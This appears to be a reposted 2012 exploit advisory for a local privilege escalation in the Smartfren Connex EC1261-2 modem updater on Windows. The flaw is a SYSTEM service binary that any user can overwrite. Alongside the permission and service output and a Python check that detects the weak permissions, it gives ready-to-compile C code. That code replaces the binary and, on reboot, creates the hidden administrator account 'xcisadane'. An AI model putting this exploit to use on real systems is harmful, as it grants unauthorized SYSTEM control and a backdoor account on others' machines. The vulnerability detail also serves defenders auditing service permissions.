Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation vulnerability and local exploit. It was tested on Microsoft Windows 7 Ultimate 64 Bit; the description of the vulnerability is given below.
==========================================================================
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
==========================================================================

# Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
# Date          : 26 September 2012
# Author        : X-Cisadane
# Software Link : http://www.smartfren.com/data/ec1261.html
# File Version  : 21.005.15.03.836
# Category      : Desktop (Windows) Applications
# Platform      : Win32 & Win64
# Vulnerability : Local Privilege Escalation Vulnerability
# Tested On     : Microsoft Windows 7 Ultimate 64 Bit (EN)
# Greetz to     : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari

Summary
=======
Smartfren Connex EC 1261-2 UI OUC is part of the Smartfren Connex EC USB EVDO Modem software. It is a daemon that updates the modem's files.

Description
===========
Improper file permissions on the application's executable (ouc.exe) allow local privilege escalation: any unprivileged user can replace the executable with a binary of their choice. The binary is registered as an auto-start service and is executed with SYSTEM privileges, so the replacement runs as SYSTEM at the next boot.

Tested on: Microsoft Windows 7 Ultimate 64 Bit (EN).
Proof of Concept
================

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
                                                                    BUILTIN\Users:F
                                                                    NT AUTHORITY\SYSTEM:(ID)F
                                                                    BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Smartfren Connex EC1261-2 UI. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

----------------------------------------------------------------------------------------------
The following attack scenario could be used:

1. An attacker (unprivileged user) renames the Smartfren Connex EC1261-2 UI. OUC program file. Depending on the platform, the file is located at:
   For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
   For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
   Rename the file to ouc.exe.old.
2. The attacker copies a malicious executable with the original file name (ouc.exe) into the same location.
3. Restart the system. After the restart, the attacker's file is executed with SYSTEM privileges.
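The condition the cacls and sc qc output above exposes (a service started as LocalSystem from a binary that Everyone or Users can write) can be checked mechanically. The Python below is an added example, not part of the original advisory: it parses constructed samples modelled on those two outputs, flags the weak ACL, and shows the same check passing on a constructed hardened ACL where Everyone is removed and Users are read-only.

```python
import re
# Constructed samples modelled on the advisory's `cacls ouc.exe` and `sc qc` output.
BINARY = r"C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe"
WEAK_CACLS = BINARY + r""" Everyone:F
    BUILTIN\Users:F
    NT AUTHORITY\SYSTEM:(ID)F
    BUILTIN\Administrators:(ID)F"""
# Constructed: the same ACL after hardening (Everyone removed, Users read-only).
FIXED_CACLS = BINARY + r""" BUILTIN\Users:R
    NT AUTHORITY\SYSTEM:(ID)F
    BUILTIN\Administrators:(ID)F"""
SC_QC = r"""[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : """ + BINARY + r"""
        SERVICE_START_NAME : LocalSystem"""
# Principals every ordinary user belongs to, and the cacls rights that permit writing.
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users"}
WRITE_RIGHTS = {"F", "C", "W"}  # Full, Change, Write

def parse_sc_qc(text):
    """Turn `sc qc` output into a {FIELD: value} dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and not key.startswith("["):
            fields[key.strip()] = value.strip()
    return fields

def parse_cacls(text, binary):
    """Return [(principal, rights)] from cacls output; the first line also carries the path."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if line.lower().startswith(binary.lower()):
            line = line[len(binary):].strip()
        principal, sep, rights = line.rpartition(":")
        if sep:  # drop inheritance flags such as (ID), (OI), (CI) before comparing rights
            aces.append((principal.strip(), re.sub(r"\([A-Z]+\)", "", rights)))
    return aces

def assess(sc_text, cacls_text):
    """Flag a service that runs as LocalSystem from a binary low-privilege users can overwrite."""
    cfg = parse_sc_qc(sc_text)
    binary = cfg["BINARY_PATH_NAME"].strip('"')
    writable = [p for p, r in parse_cacls(cacls_text, binary)
                if p.lower() in LOW_PRIV and r in WRITE_RIGHTS]
    return {"service": cfg["SERVICE_NAME"], "binary": binary, "account": cfg["SERVICE_START_NAME"],
            "writable_by": writable,
            "vulnerable": cfg["SERVICE_START_NAME"] == "LocalSystem" and bool(writable)}
```

On a real host the two inputs would come from running `sc qc` and `cacls` against each auto-start service; a service with a quoted BINARY_PATH_NAME that carries arguments would need the arguments split off before the ACL lookup.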
You can also do it with these two simple programs:

------------------------------------- [ CUT HERE ] -------------------------------------------
Compile the code below with Dev-C++ and save it as C:\sploit.cpp

#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{
    /* Rename the original ouc.exe to ouc.exe.old (allowed because Everyone has Full control) */
    if (!MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP)) { printf("MoveFile failed: %lu\n", GetLastError()); return 1; }
    /* Place the replacement binary at the path the service starts from (FALSE = overwrite if present) */
    if (!CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE)) { printf("CopyFile failed: %lu\n", GetLastError()); return 1; }
    return 0;
}

Compile the code below with Dev-C++ and save it as C:\bin.cpp

#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
/* Start cmd.exe with the given arguments and wait for it, so step TWO runs after step ONE has finished */
static void run(const char *args)
{
    STARTUPINFO si = {sizeof(STARTUPINFO)};
    PROCESS_INFORMATION pi;
    char cmdline[128];  /* CreateProcess may modify lpCommandLine, so pass a writable copy */
    lstrcpynA(cmdline, args, sizeof(cmdline));
    if (CreateProcess(CMD, cmdline, NULL, NULL, 0, 0, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hThread); CloseHandle(pi.hProcess);
    }
}
int main(int argc, char *argv[])
{
    run(ONE); /* runs as SYSTEM when the service starts: creates the account */
    run(TWO); /* adds the account to the local Administrators group */
    return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------

Run sploit.exe from C:\ and reboot Windows. After the reboot, check "net user" from a Command Prompt: if a user named xcisadane exists, the exploit succeeded.

P.S.: For Win32, change "Program Files (x86)" to "Program Files".
Our previous post, titled Cisco DPC2100 Denial of Service, provides information on Cisco Denial of Service, Denial of Service, and Denial of Service attacks.